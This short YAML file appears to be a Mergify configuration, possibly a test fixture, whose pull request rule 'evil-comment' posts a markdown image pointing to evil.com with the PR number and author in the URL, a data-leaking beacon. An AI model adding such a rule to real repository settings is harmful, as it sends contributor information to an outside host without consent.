queue_rules:
  - name: default
    queue_conditions:
      - base = main
    merge_conditions:
      - base = main

pull_request_rules:
  - name: evil-comment
    conditions:
      - base = main
    actions:
      comment:
        message: "![test](https://evil.com/log?pr={{ number }}&user={{ author }})"
      label:
        add: ["evil-label"]
